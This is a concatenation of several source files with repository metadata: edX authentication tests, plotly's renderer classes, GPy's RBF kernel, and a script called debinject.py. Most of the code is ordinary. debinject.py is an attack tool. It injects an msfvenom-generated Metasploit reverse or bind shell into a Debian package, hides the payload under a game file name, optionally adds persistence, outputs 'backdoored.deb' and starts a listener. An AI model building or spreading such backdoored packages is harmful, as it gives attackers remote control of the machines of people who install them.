self.client.logout()
for status in [200, 403]:
response = self._change_password(email=self.NEW_EMAIL)
self.assertEqual(response.status_code, status)
with patch(
'util.request_rate_limiter.PasswordResetEmailRateLimiter.is_rate_limit_exceeded',
return_value=False
):
response = self._change_password(email=self.NEW_EMAIL)
self.assertEqual(response.status_code, 200)
@ddt.data(
('post', 'password_change_request', []),
)
@ddt.unpack
def test_require_http_method(self, correct_method, url_name, args):
wrong_methods = {'get', 'put', 'post', 'head', 'options', 'delete'} - {correct_method}
url = reverse(url_name, args=args)
for method in wrong_methods:
response = getattr(self.client, method)(url)
self.assertEqual(response.status_code, 405)
def _change_password(self, email=None):
"""Request to change the user's password. """
data = {}
if email:
data['email'] = email
return self.client.post(path=reverse('password_change_request'), data=data)
def _create_dot_tokens(self, user=None):
"""Create dot access token for given user if user provided else for default user."""
if not user:
user = User.objects.get(email=self.OLD_EMAIL)
application = dot_factories.ApplicationFactory(user=user)
access_token = dot_factories.AccessTokenFactory(user=user, application=application)
dot_factories.RefreshTokenFactory(user=user, application=application, access_token=access_token)
def _assert_access_token_destroyed(self, user):
"""Assert all access tokens are destroyed."""
self.assertFalse(dot_access_token.objects.filter(user=user).exists())
self.assertFalse(dot_refresh_token.objects.filter(user=user).exists())
| appsembler/edx-platform | openedx/core/djangoapps/user_authn/views/tests/test_password.py | Python | agpl-3.0 | 12,725 | [
"VisIt"
] | 14de40d42c1f4079491bf3500966d1b493237c4dcf2b144ee39e50196fa1c752 |
from __future__ import absolute_import
import base64
import json
import webbrowser
import inspect
import os
from os.path import isdir
import six
from plotly import utils, optional_imports
from plotly.io import to_json, to_image, write_image, write_html
from plotly.io._orca import ensure_server
from plotly.io._utils import plotly_cdn_url
from plotly.offline.offline import _get_jconfig, get_plotlyjs
from plotly.tools import return_figure_from_figure_or_data
ipython_display = optional_imports.get_module("IPython.display")
IPython = optional_imports.get_module("IPython")
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2.7
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
class BaseRenderer(object):
"""
Base class for all renderers
"""
def activate(self):
pass
def __repr__(self):
try:
init_sig = inspect.signature(self.__init__)
init_args = list(init_sig.parameters.keys())
except AttributeError:
# Python 2.7
argspec = inspect.getargspec(self.__init__)
init_args = [a for a in argspec.args if a != "self"]
return "{cls}({attrs})\n{doc}".format(
cls=self.__class__.__name__,
attrs=", ".join("{}={!r}".format(k, self.__dict__[k]) for k in init_args),
doc=self.__doc__,
)
def __hash__(self):
# Constructor args fully define uniqueness
return hash(repr(self))
class MimetypeRenderer(BaseRenderer):
"""
Base class for all mime type renderers
"""
def to_mimebundle(self, fig_dict):
raise NotImplementedError()
class JsonRenderer(MimetypeRenderer):
"""
Renderer to display figures as JSON hierarchies. This renderer is
compatible with JupyterLab and VSCode.
mime type: 'application/json'
"""
def to_mimebundle(self, fig_dict):
value = json.loads(to_json(fig_dict, validate=False, remove_uids=False))
return {"application/json": value}
# Plotly mimetype
class PlotlyRenderer(MimetypeRenderer):
"""
Renderer to display figures using the plotly mime type. This renderer is
compatible with JupyterLab (using the @jupyterlab/plotly-extension),
VSCode, and nteract.
mime type: 'application/vnd.plotly.v1+json'
"""
def __init__(self, config=None):
self.config = dict(config) if config else {}
def to_mimebundle(self, fig_dict):
config = _get_jconfig(self.config)
if config:
fig_dict["config"] = config
json_compatible_fig_dict = json.loads(
to_json(fig_dict, validate=False, remove_uids=False)
)
return {"application/vnd.plotly.v1+json": json_compatible_fig_dict}
# Static Image
class ImageRenderer(MimetypeRenderer):
"""
Base class for all static image renderers
"""
def __init__(
self,
mime_type,
b64_encode=False,
format=None,
width=None,
height=None,
scale=None,
engine="auto",
):
self.mime_type = mime_type
self.b64_encode = b64_encode
self.format = format
self.width = width
self.height = height
self.scale = scale
self.engine = engine
def to_mimebundle(self, fig_dict):
image_bytes = to_image(
fig_dict,
format=self.format,
width=self.width,
height=self.height,
scale=self.scale,
validate=False,
engine=self.engine,
)
if self.b64_encode:
image_str = base64.b64encode(image_bytes).decode("utf8")
else:
image_str = image_bytes.decode("utf8")
return {self.mime_type: image_str}
class PngRenderer(ImageRenderer):
"""
Renderer to display figures as static PNG images. This renderer requires
either the kaleido package or the orca command-line utility and is broadly
compatible across IPython environments (classic Jupyter Notebook, JupyterLab,
QtConsole, VSCode, PyCharm, etc) and nbconvert targets (HTML, PDF, etc.).
mime type: 'image/png'
"""
def __init__(self, width=None, height=None, scale=None, engine="auto"):
super(PngRenderer, self).__init__(
mime_type="image/png",
b64_encode=True,
format="png",
width=width,
height=height,
scale=scale,
engine=engine,
)
class SvgRenderer(ImageRenderer):
"""
Renderer to display figures as static SVG images. This renderer requires
either the kaleido package or the orca command-line utility and is broadly
compatible across IPython environments (classic Jupyter Notebook, JupyterLab,
QtConsole, VSCode, PyCharm, etc) and nbconvert targets (HTML, PDF, etc.).
mime type: 'image/svg+xml'
"""
def __init__(self, width=None, height=None, scale=None, engine="auto"):
super(SvgRenderer, self).__init__(
mime_type="image/svg+xml",
b64_encode=False,
format="svg",
width=width,
height=height,
scale=scale,
engine=engine,
)
class JpegRenderer(ImageRenderer):
"""
Renderer to display figures as static JPEG images. This renderer requires
either the kaleido package or the orca command-line utility and is broadly
compatible across IPython environments (classic Jupyter Notebook, JupyterLab,
QtConsole, VSCode, PyCharm, etc) and nbconvert targets (HTML, PDF, etc.).
mime type: 'image/jpeg'
"""
def __init__(self, width=None, height=None, scale=None, engine="auto"):
super(JpegRenderer, self).__init__(
mime_type="image/jpeg",
b64_encode=True,
format="jpg",
width=width,
height=height,
scale=scale,
engine=engine,
)
class PdfRenderer(ImageRenderer):
"""
Renderer to display figures as static PDF images. This renderer requires
either the kaleido package or the orca command-line utility and is compatible
with JupyterLab and the LaTeX-based nbconvert export to PDF.
mime type: 'application/pdf'
"""
def __init__(self, width=None, height=None, scale=None, engine="auto"):
super(PdfRenderer, self).__init__(
mime_type="application/pdf",
b64_encode=True,
format="pdf",
width=width,
height=height,
scale=scale,
engine=engine,
)
# HTML
# Build script to set global PlotlyConfig object. This must execute before
# plotly.js is loaded.
_window_plotly_config = """\
window.PlotlyConfig = {MathJaxConfig: 'local'};"""
_mathjax_config = """\
if (window.MathJax) {MathJax.Hub.Config({SVG: {font: "STIX-Web"}});}"""
class HtmlRenderer(MimetypeRenderer):
"""
Base class for all HTML mime type renderers
mime type: 'text/html'
"""
def __init__(
self,
connected=False,
full_html=False,
requirejs=True,
global_init=False,
config=None,
auto_play=False,
post_script=None,
animation_opts=None,
):
self.config = dict(config) if config else {}
self.auto_play = auto_play
self.connected = connected
self.global_init = global_init
self.requirejs = requirejs
self.full_html = full_html
self.animation_opts = animation_opts
self.post_script = post_script
def activate(self):
if self.global_init:
if not ipython_display:
raise ValueError(
"The {cls} class requires ipython but it is not installed".format(
cls=self.__class__.__name__
)
)
if not self.requirejs:
raise ValueError("global_init is only supported with requirejs=True")
if self.connected:
# Connected so we configure requirejs with the plotly CDN
script = """\
<script type="text/javascript">
{win_config}
{mathjax_config}
if (typeof require !== 'undefined') {{
require.undef("plotly");
requirejs.config({{
paths: {{
'plotly': ['{plotly_cdn}']
}}
}});
require(['plotly'], function(Plotly) {{
window._Plotly = Plotly;
}});
}}
</script>
""".format(
win_config=_window_plotly_config,
mathjax_config=_mathjax_config,
plotly_cdn=plotly_cdn_url().rstrip(".js"),
)
else:
# If not connected then we embed a copy of the plotly.js
# library in the notebook
script = """\
<script type="text/javascript">
{win_config}
{mathjax_config}
if (typeof require !== 'undefined') {{
require.undef("plotly");
define('plotly', function(require, exports, module) {{
{script}
}});
require(['plotly'], function(Plotly) {{
window._Plotly = Plotly;
}});
}}
</script>
""".format(
script=get_plotlyjs(),
win_config=_window_plotly_config,
mathjax_config=_mathjax_config,
)
ipython_display.display_html(script, raw=True)
def to_mimebundle(self, fig_dict):
from plotly.io import to_html
if self.requirejs:
include_plotlyjs = "require"
include_mathjax = False
elif self.connected:
include_plotlyjs = "cdn"
include_mathjax = "cdn"
else:
include_plotlyjs = True
include_mathjax = "cdn"
# build post script
post_script = [
"""
var gd = document.getElementById('{plot_id}');
var x = new MutationObserver(function (mutations, observer) {{
var display = window.getComputedStyle(gd).display;
if (!display || display === 'none') {{
console.log([gd, 'removed!']);
Plotly.purge(gd);
observer.disconnect();
}}
}});
// Listen for the removal of the full notebook cells
var notebookContainer = gd.closest('#notebook-container');
if (notebookContainer) {{
x.observe(notebookContainer, {childList: true});
}}
// Listen for the clearing of the current output cell
var outputEl = gd.closest('.output');
if (outputEl) {{
x.observe(outputEl, {childList: true});
}}
"""
]
# Add user defined post script
if self.post_script:
if not isinstance(self.post_script, (list, tuple)):
post_script.append(self.post_script)
else:
post_script.extend(self.post_script)
html = to_html(
fig_dict,
config=self.config,
auto_play=self.auto_play,
include_plotlyjs=include_plotlyjs,
include_mathjax=include_mathjax,
post_script=post_script,
full_html=self.full_html,
animation_opts=self.animation_opts,
default_width="100%",
default_height=525,
validate=False,
)
return {"text/html": html}
class NotebookRenderer(HtmlRenderer):
"""
Renderer to display interactive figures in the classic Jupyter Notebook.
This renderer is also useful for notebooks that will be converted to
HTML using nbconvert/nbviewer as it will produce standalone HTML files
that include interactive figures.
This renderer automatically performs global notebook initialization when
activated.
mime type: 'text/html'
"""
def __init__(
self,
connected=False,
config=None,
auto_play=False,
post_script=None,
animation_opts=None,
):
super(NotebookRenderer, self).__init__(
connected=connected,
full_html=False,
requirejs=True,
global_init=True,
config=config,
auto_play=auto_play,
post_script=post_script,
animation_opts=animation_opts,
)
class KaggleRenderer(HtmlRenderer):
"""
Renderer to display interactive figures in Kaggle Notebooks.
Same as NotebookRenderer but with connected=True so that the plotly.js
bundle is loaded from a CDN rather than being embedded in the notebook.
This renderer is enabled by default when running in a Kaggle notebook.
mime type: 'text/html'
"""
def __init__(
self, config=None, auto_play=False, post_script=None, animation_opts=None
):
super(KaggleRenderer, self).__init__(
connected=True,
full_html=False,
requirejs=True,
global_init=True,
config=config,
auto_play=auto_play,
post_script=post_script,
animation_opts=animation_opts,
)
class AzureRenderer(HtmlRenderer):
"""
Renderer to display interactive figures in Azure Notebooks.
Same as NotebookRenderer but with connected=True so that the plotly.js
bundle is loaded from a CDN rather than being embedded in the notebook.
This renderer is enabled by default when running in an Azure notebook.
mime type: 'text/html'
"""
def __init__(
self, config=None, auto_play=False, post_script=None, animation_opts=None
):
super(AzureRenderer, self).__init__(
connected=True,
full_html=False,
requirejs=True,
global_init=True,
config=config,
auto_play=auto_play,
post_script=post_script,
animation_opts=animation_opts,
)
class ColabRenderer(HtmlRenderer):
"""
Renderer to display interactive figures in Google Colab Notebooks.
This renderer is enabled by default when running in a Colab notebook.
mime type: 'text/html'
"""
def __init__(
self, config=None, auto_play=False, post_script=None, animation_opts=None
):
super(ColabRenderer, self).__init__(
connected=True,
full_html=True,
requirejs=False,
global_init=False,
config=config,
auto_play=auto_play,
post_script=post_script,
animation_opts=animation_opts,
)
class IFrameRenderer(MimetypeRenderer):
"""
Renderer to display interactive figures using an IFrame. HTML
representations of Figures are saved to an `iframe_figures/` directory and
iframe HTML elements that reference these files are inserted into the
notebook.
With this approach, neither plotly.js nor the figure data are embedded in
the notebook, so this is a good choice for notebooks that contain so many
large figures that basic operations (like saving and opening) become
very slow.
Notebooks using this renderer will display properly when exported to HTML
as long as the `iframe_figures/` directory is placed in the same directory
as the exported html file.
Note that the HTML files in `iframe_figures/` are numbered according to
the IPython cell execution count and so they will start being overwritten
each time the kernel is restarted. This directory may be deleted whenever
the kernel is restarted and it will be automatically recreated.
mime type: 'text/html'
"""
def __init__(
self,
config=None,
auto_play=False,
post_script=None,
animation_opts=None,
include_plotlyjs=True,
html_directory="iframe_figures",
):
self.config = config
self.auto_play = auto_play
self.post_script = post_script
self.animation_opts = animation_opts
self.include_plotlyjs = include_plotlyjs
self.html_directory = html_directory
def to_mimebundle(self, fig_dict):
from plotly.io import write_html
# Make iframe size slightly larger than figure size to avoid
# having iframe have its own scroll bar.
iframe_buffer = 20
layout = fig_dict.get("layout", {})
if layout.get("width", False):
iframe_width = str(layout["width"] + iframe_buffer) + "px"
else:
iframe_width = "100%"
if layout.get("height", False):
iframe_height = layout["height"] + iframe_buffer
else:
iframe_height = str(525 + iframe_buffer) + "px"
# Build filename using ipython cell number
filename = self.build_filename()
# Make directory for
try:
os.makedirs(self.html_directory)
except OSError as error:
if not isdir(self.html_directory):
raise
write_html(
fig_dict,
filename,
config=self.config,
auto_play=self.auto_play,
include_plotlyjs=self.include_plotlyjs,
include_mathjax="cdn",
auto_open=False,
post_script=self.post_script,
animation_opts=self.animation_opts,
default_width="100%",
default_height=525,
validate=False,
)
# Build IFrame
iframe_html = """\
<iframe
scrolling="no"
width="{width}"
height="{height}"
src="{src}"
frameborder="0"
allowfullscreen
></iframe>
""".format(
width=iframe_width, height=iframe_height, src=self.build_url(filename)
)
return {"text/html": iframe_html}
def build_filename(self):
ip = IPython.get_ipython() if IPython else None
cell_number = list(ip.history_manager.get_tail(1))[0][1] + 1 if ip else 0
filename = "{dirname}/figure_{cell_number}.html".format(
dirname=self.html_directory, cell_number=cell_number
)
return filename
def build_url(self, filename):
return filename
class CoCalcRenderer(IFrameRenderer):
_render_count = 0
def build_filename(self):
filename = "{dirname}/figure_{render_count}.html".format(
dirname=self.html_directory, render_count=CoCalcRenderer._render_count
)
CoCalcRenderer._render_count += 1
return filename
def build_url(self, filename):
return "{filename}?fullscreen=kiosk".format(filename=filename)
class ExternalRenderer(BaseRenderer):
"""
Base class for external renderers. ExternalRenderer subclasses
do not display figures inline in a notebook environment, but render
figures by some external means (e.g. a separate browser tab).
Unlike MimetypeRenderer subclasses, ExternalRenderer subclasses are not
invoked when a figure is asked to display itself in the notebook.
Instead, they are invoked when the plotly.io.show function is called
on a figure.
"""
def render(self, fig):
raise NotImplementedError()
def open_html_in_browser(html, using=None, new=0, autoraise=True):
"""
Display html in a web browser without creating a temp file.
Instantiates a trivial http server and uses the webbrowser module to
open a URL to retrieve html from that server.
Parameters
----------
html: str
HTML string to display
using, new, autoraise:
See docstrings in webbrowser.get and webbrowser.open
"""
if isinstance(html, six.string_types):
html = html.encode("utf8")
browser = None
if using is None:
browser = webbrowser.get(None)
else:
if not isinstance(using, tuple):
using = (using,)
for browser_key in using:
try:
browser = webbrowser.get(browser_key)
if browser is not None:
break
except webbrowser.Error:
pass
if browser is None:
raise ValueError("Can't locate a browser with key in " + str(using))
class OneShotRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
bufferSize = 1024 * 1024
for i in range(0, len(html), bufferSize):
self.wfile.write(html[i : i + bufferSize])
def log_message(self, format, *args):
# Silence stderr logging
pass
server = HTTPServer(("127.0.0.1", 0), OneShotRequestHandler)
browser.open(
"http://127.0.0.1:%s" % server.server_port, new=new, autoraise=autoraise
)
server.handle_request()
class BrowserRenderer(ExternalRenderer):
"""
Renderer to display interactive figures in an external web browser.
This renderer will open a new browser window or tab when the
plotly.io.show function is called on a figure.
This renderer has no ipython/jupyter dependencies and is a good choice
for use in environments that do not support the inline display of
interactive figures.
mime type: 'text/html'
"""
def __init__(
self,
config=None,
auto_play=False,
using=None,
new=0,
autoraise=True,
post_script=None,
animation_opts=None,
):
self.config = config
self.auto_play = auto_play
self.using = using
self.new = new
self.autoraise = autoraise
self.post_script = post_script
self.animation_opts = animation_opts
def render(self, fig_dict):
from plotly.io import to_html
html = to_html(
fig_dict,
config=self.config,
auto_play=self.auto_play,
include_plotlyjs=True,
include_mathjax="cdn",
post_script=self.post_script,
full_html=True,
animation_opts=self.animation_opts,
default_width="100%",
default_height="100%",
validate=False,
)
open_html_in_browser(html, self.using, self.new, self.autoraise)
class DatabricksRenderer(ExternalRenderer):
def __init__(
self,
config=None,
auto_play=False,
post_script=None,
animation_opts=None,
include_plotlyjs="cdn",
):
self.config = config
self.auto_play = auto_play
self.post_script = post_script
self.animation_opts = animation_opts
self.include_plotlyjs = include_plotlyjs
self._displayHTML = None
@property
def displayHTML(self):
import inspect
if self._displayHTML is None:
for frame in inspect.getouterframes(inspect.currentframe()):
global_names = set(frame.frame.f_globals)
# Check for displayHTML plus a few others to reduce chance of a false
# hit.
if all(v in global_names for v in ["displayHTML", "display", "spark"]):
self._displayHTML = frame.frame.f_globals["displayHTML"]
break
if self._displayHTML is None:
raise EnvironmentError(
"""
Unable to detect the Databricks displayHTML function. The 'databricks' renderer is only
supported when called from within the Databricks notebook environment."""
)
return self._displayHTML
def render(self, fig_dict):
from plotly.io import to_html
html = to_html(
fig_dict,
config=self.config,
auto_play=self.auto_play,
include_plotlyjs=self.include_plotlyjs,
include_mathjax="cdn",
post_script=self.post_script,
full_html=True,
animation_opts=self.animation_opts,
default_width="100%",
default_height="100%",
validate=False,
)
# displayHTML is a Databricks notebook built-in function
self.displayHTML(html)
class SphinxGalleryHtmlRenderer(HtmlRenderer):
def __init__(
self,
connected=True,
config=None,
auto_play=False,
post_script=None,
animation_opts=None,
):
super(SphinxGalleryHtmlRenderer, self).__init__(
connected=connected,
full_html=False,
requirejs=False,
global_init=False,
config=config,
auto_play=auto_play,
post_script=post_script,
animation_opts=animation_opts,
)
def to_mimebundle(self, fig_dict):
from plotly.io import to_html
if self.requirejs:
include_plotlyjs = "require"
include_mathjax = False
elif self.connected:
include_plotlyjs = "cdn"
include_mathjax = "cdn"
else:
include_plotlyjs = True
include_mathjax = "cdn"
html = to_html(
fig_dict,
config=self.config,
auto_play=self.auto_play,
include_plotlyjs=include_plotlyjs,
include_mathjax=include_mathjax,
full_html=self.full_html,
animation_opts=self.animation_opts,
default_width="100%",
default_height=525,
validate=False,
)
return {"text/html": html}
class SphinxGalleryOrcaRenderer(ExternalRenderer):
def render(self, fig_dict):
stack = inspect.stack()
# Name of script from which plot function was called is retrieved
try:
filename = stack[3].filename # let's hope this is robust...
except: # python 2
filename = stack[3][1]
filename_root, _ = os.path.splitext(filename)
filename_html = filename_root + ".html"
filename_png = filename_root + ".png"
figure = return_figure_from_figure_or_data(fig_dict, True)
_ = write_html(fig_dict, file=filename_html, include_plotlyjs="cdn")
try:
write_image(figure, filename_png)
except (ValueError, ImportError):
raise ImportError(
"orca and psutil are required to use the `sphinx-gallery-orca` renderer. "
"See https://plotly.com/python/static-image-export/ for instructions on "
"how to install orca. Alternatively, you can use the `sphinx-gallery` "
"renderer (note that png thumbnails can only be generated with "
"the `sphinx-gallery-orca` renderer)."
)
| plotly/plotly.py | packages/python/plotly/plotly/io/_base_renderers.py | Python | mit | 26,732 | [
"ORCA"
] | 682bef549fe48afb90ee7754ada470e9669f2bd636c025405a7e912d506db2dd |
# Copyright (c) 2012, GPy authors (see AUTHORS.txt).
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import numpy as np
from stationary import Stationary
from psi_comp import PSICOMP_RBF
from psi_comp.rbf_psi_gpucomp import PSICOMP_RBF_GPU
from ...util.config import *
class RBF(Stationary):
"""
Radial Basis Function kernel, aka squared-exponential, exponentiated quadratic or Gaussian kernel:
.. math::
k(r) = \sigma^2 \exp \\bigg(- \\frac{1}{2} r^2 \\bigg)
"""
_support_GPU = True
def __init__(self, input_dim, variance=1., lengthscale=None, ARD=False, active_dims=None, name='rbf', useGPU=False):
super(RBF, self).__init__(input_dim, variance, lengthscale, ARD, active_dims, name, useGPU=useGPU)
self.psicomp = PSICOMP_RBF()
if self.useGPU:
self.psicomp = PSICOMP_RBF_GPU()
else:
self.psicomp = PSICOMP_RBF()
def K_of_r(self, r):
return self.variance * np.exp(-0.5 * r**2)
def dK_dr(self, r):
return -r*self.K_of_r(r)
def __getstate__(self):
dc = super(RBF, self).__getstate__()
if self.useGPU:
dc['psicomp'] = PSICOMP_RBF()
return dc
def __setstate__(self, state):
return super(RBF, self).__setstate__(state)
def spectrum(self, omega):
assert self.input_dim == 1 #TODO: higher dim spectra?
return self.variance*np.sqrt(2*np.pi)*self.lengthscale*np.exp(-self.lengthscale*2*omega**2/2)
#---------------------------------------#
# PSI statistics #
#---------------------------------------#
def psi0(self, Z, variational_posterior):
return self.psicomp.psicomputations(self.variance, self.lengthscale, Z, variational_posterior)[0]
def psi1(self, Z, variational_posterior):
return self.psicomp.psicomputations(self.variance, self.lengthscale, Z, variational_posterior)[1]
def psi2(self, Z, variational_posterior):
return self.psicomp.psicomputations(self.variance, self.lengthscale, Z, variational_posterior)[2]
def update_gradients_expectations(self, dL_dpsi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior):
dL_dvar, dL_dlengscale = self.psicomp.psiDerivativecomputations(dL_dpsi0, dL_dpsi1, dL_dpsi2, self.variance, self.lengthscale, Z, variational_posterior)[:2]
self.variance.gradient = dL_dvar
self.lengthscale.gradient = dL_dlengscale
def gradients_Z_expectations(self, dL_dpsi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior):
return self.psicomp.psiDerivativecomputations(dL_dpsi0, dL_dpsi1, dL_dpsi2, self.variance, self.lengthscale, Z, variational_posterior)[2]
def gradients_qX_expectations(self, dL_dpsi0, dL_dpsi1, dL_dpsi2, Z, variational_posterior):
return self.psicomp.psiDerivativecomputations(dL_dpsi0, dL_dpsi1, dL_dpsi2, self.variance, self.lengthscale, Z, variational_posterior)[3:]
| TianpeiLuke/GPy | GPy/kern/_src/rbf.py | Python | bsd-3-clause | 2,940 | [
"Gaussian"
] | ee63a4212c196dbd342395f6c146873c0c0e6caf6811b4e96ae8000bd5a5121f |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#-------------------------------
#
# BY: UNDEADSEC from BRAZIL :)
# Visit: https://www.youtube.com/c/UndeadSec
# Github: https://github.com/UndeadSec/EvilURL
# Telegram: https://t.me/UndeadSec
#
#-------------------------------
BLUE, RED, WHITE, YELLOW, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;32m', '\033[0m'
#-------------------------------
from subprocess import call
#-------------------------------
def message():
call('clear', shell=True)
print """
--------------------{1}
┌┬┐┌─┐┌┐ ┬┌┐┌ ┬┌─┐┌─┐┌┬┐
││├┤ ├┴┐││││ │├┤ │ │ BY: {1}Undead{2}Sec{1} from BRazil {0}
─┴┘└─┘└─┘┴┘└┘└┘└─┘└─┘ ┴
{0} --------------------{1}
""".format(GREEN, END, RED, YELLOW, GREEN)
#-------------------------------
def main():
call('rm -Rf output', shell=True)
call("rm -Rf /tmp/evil", shell=True)
print '~ / Inject malicious codes into *.deb\'s\n '
print "{0}[-] Insert *.deb file path: {1}".format(YELLOW, END)
file_path = raw_input("\n{0}debinject{1} > ".format(GREEN, END))
print "\n{0}[-] Insert LHOST: {1}".format(YELLOW, END)
LHOST = raw_input("\n{0}debinject{1} > ".format(GREEN, END))
print "\n{0}[-] Insert LPORT: {1}".format(YELLOW, END)
LPORT = raw_input("\n{0}debinject{1} > ".format(GREEN, END))
call('mkdir /tmp/evil', shell=True)
call('cp ' + file_path + ' /tmp/evil/original.deb', shell=True)
call('dpkg -x /tmp/evil/original.deb /tmp/evil/work', shell=True)
call('mkdir /tmp/evil/work/DEBIAN', shell=True)
#-------------------------------
def setArch():
print '\nInsert the target arch x86 or x64: '
arch = raw_input("\n{0}debinject{1} > ".format(GREEN, END))
if arch == 'x64':
call('cp Utils/x64/control /tmp/evil/work/DEBIAN')
call('cp Utils/x64/postinst /tmp/evil/work/DEBIAN')
elif arch == 'x86':
call('cp Utils/x86/control /tmp/evil/work/DEBIAN')
call('cp Utils/x86/postinst /tmp/evil/work/DEBIAN')
else:
print "\nChoose [x64] or [x86]"
#-------------------------------
def setPayload():
print "\n - CHOOSE THE PAYLOAD - \n[1] metasploit/linux/<arch>/shell/reverse_tcp\n[2] metasploit/linux/<arch>/meterpreter/reverse_tcp\n[3] metasploit/linux/<arch>/meterpreter/bind_tcp\n[4] metasploit/linux/<arch>/shell/bind_tcp"
option = raw_input("\n{0}debinject{1} > ".format(GREEN, END))
if option == '1':
call('msfvenom -a ' + arch + ' --platform linux -p linux/' + arch + '/shell/reverse_tcp LHOST=' + LHOST + ' LPORT=' + LPORT + ' -f elf -o /tmp/evil/work/usr/games/freesweep_scores', shell=True)
elif option == '2':
call('msfvenom -a ' + arch + ' --platform linux -p linux/' + arch + '/meterpreter/reverse_tcp LHOST=' + LHOST + ' LPORT=' + LPORT + ' -f elf -o /tmp/evil/work/usr/games/freesweep_scores', shell=True)
elif option == '3':
call('msfvenom -a ' + arch + ' --platform linux -p linux/' + arch + '/meterpreter/bind_tcp LHOST=' + LHOST + ' LPORT=' + LPORT + ' -f elf -o /tmp/evil/work/usr/games/freesweep_scores', shell=True)
elif option == '4':
call('msfvenom -a ' + arch + ' --platform linux -p linux/' + arch + '/shell/bind_tcp LHOST=' + LHOST + ' LPORT=' + LPORT + ' -f elf -o /tmp/evil/work/usr/games/freesweep_scores', shell=True)
else:
print "\nInvalid"
call('exit', shell=True)
#-------------------------------
def setPersistence():
persistence = raw_input('\nDo you want to enable persistence?(y/n) : ')
if persistence.upper() == 'Y':
call('cp Utils/Persistence/kernellog /tmp/evil/work/usr/games/', shell=True)
#-------------------------------
def makeEvil():
call('chmod 755 /tmp/evil/work/DEBIAN/postinst', shell=True)
call('cd /tmp/evil/work/DEBIAN && dpkg-deb --build /tmp/evil/work', shell=True)
call('rm -Rf output/ && mkdir output', shell=True)
call('mv /tmp/evil/work.deb output/backdoored.deb && chmod 755 output/backdoored.deb', shell=True)
print "\n The .deb backdoored saved to: /output/backdoored.deb\n"
listen = raw_input("Do you want to start listener? (y/n): ")
if option != '3' and option != '4':
if listen.upper() == "Y":
if option == '1':
call('service postgresql start', shell=True)
call('msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/' + arch + '/shell/reverse_tcp; set LHOST ' + LHOST + '; set LPORT ' + LPORT + '; run; exit -y"', shell=True)
elif option == '2':
call('service postgresql start')
call('msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/' + arch + '/meterpreter/reverse_tcp; set LHOST ' + LHOST + '; set LPORT ' + LPORT + '; run; exit -y"', shell=True)
else:
print "Bye :D"
else:
print "\nStart Metasploit listener and Happy Hacking"
#-------------------------------
if __name__ == '__main__':
message()
main()
setArch()
setPayload()
setPersistence()
makeEvil()
| UndeadSec/Debinject | debinject.py | Python | bsd-3-clause | 5,133 | [
"VisIt"
] | 34e4e89f1c7c07726820d023743e44e6dd3192ad841efee3c2168b7413beb04b |
# -*- coding: utf-8 -*-
"""
End-to-end tests for the LMS.
"""
from flaky import flaky
from textwrap import dedent
from unittest import skip
from nose.plugins.attrib import attr
from bok_choy.promise import EmptyPromise
from bok_choy.web_app_test import WebAppTest
from ..helpers import (
UniqueCourseTest,
EventsTestMixin,
load_data_str,
generate_course_key,
select_option_by_value,
element_has_text
)
from ...pages.lms.auto_auth import AutoAuthPage
from ...pages.lms.create_mode import ModeCreationPage
from ...pages.common.logout import LogoutPage
from ...pages.lms.course_info import CourseInfoPage
from ...pages.lms.tab_nav import TabNavPage
from ...pages.lms.course_nav import CourseNavPage
from ...pages.lms.progress import ProgressPage
from ...pages.lms.dashboard import DashboardPage
from ...pages.lms.problem import ProblemPage
from ...pages.lms.video.video import VideoPage
from ...pages.lms.courseware import CoursewarePage
from ...pages.studio.settings import SettingsPage
from ...pages.lms.login_and_register import CombinedLoginAndRegisterPage
from ...pages.lms.track_selection import TrackSelectionPage
from ...pages.lms.pay_and_verify import PaymentAndVerificationFlow, FakePaymentPage
from ...pages.lms.course_wiki import CourseWikiPage, CourseWikiEditPage
from ...fixtures.course import CourseFixture, XBlockFixtureDesc, CourseUpdateDesc
@attr('shard_1')
class LoginFromCombinedPageTest(UniqueCourseTest):
"""Test that we can log in using the combined login/registration page.
Also test that we can request a password reset from the combined
login/registration page.
"""
def setUp(self):
"""Initialize the page objects and create a test course. """
super(LoginFromCombinedPageTest, self).setUp()
self.login_page = CombinedLoginAndRegisterPage(
self.browser,
start_page="login",
course_id=self.course_id
)
self.dashboard_page = DashboardPage(self.browser)
# Create a course to enroll in
CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
).install()
def test_login_success(self):
# Create a user account
email, password = self._create_unique_user()
# Navigate to the login page and try to log in
self.login_page.visit().login(email=email, password=password)
# Expect that we reach the dashboard and we're auto-enrolled in the course
course_names = self.dashboard_page.wait_for_page().available_courses
self.assertIn(self.course_info["display_name"], course_names)
def test_login_failure(self):
# Navigate to the login page
self.login_page.visit()
# User account does not exist
self.login_page.login(email="nobody@nowhere.com", password="password")
# Verify that an error is displayed
self.assertIn("Email or password is incorrect.", self.login_page.wait_for_errors())
def test_toggle_to_register_form(self):
self.login_page.visit().toggle_form()
self.assertEqual(self.login_page.current_form, "register")
@flaky # TODO fix this, see ECOM-1165
def test_password_reset_success(self):
# Create a user account
email, password = self._create_unique_user() # pylint: disable=unused-variable
# Navigate to the password reset form and try to submit it
self.login_page.visit().password_reset(email=email)
# Expect that we're shown a success message
self.assertIn("PASSWORD RESET EMAIL SENT", self.login_page.wait_for_success())
def test_password_reset_failure(self):
# Navigate to the password reset form
self.login_page.visit()
# User account does not exist
self.login_page.password_reset(email="nobody@nowhere.com")
# Expect that we're shown a failure message
self.assertIn(
"No user with the provided email address exists.",
self.login_page.wait_for_errors()
)
def _create_unique_user(self):
"""
Create a new user with a unique name and email.
"""
username = "test_{uuid}".format(uuid=self.unique_id[0:6])
email = "{user}@example.com".format(user=username)
password = "password"
# Create the user (automatically logs us in)
AutoAuthPage(
self.browser,
username=username,
email=email,
password=password
).visit()
# Log out
LogoutPage(self.browser).visit()
return (email, password)
@attr('shard_1')
class RegisterFromCombinedPageTest(UniqueCourseTest):
"""Test that we can register a new user from the combined login/registration page. """
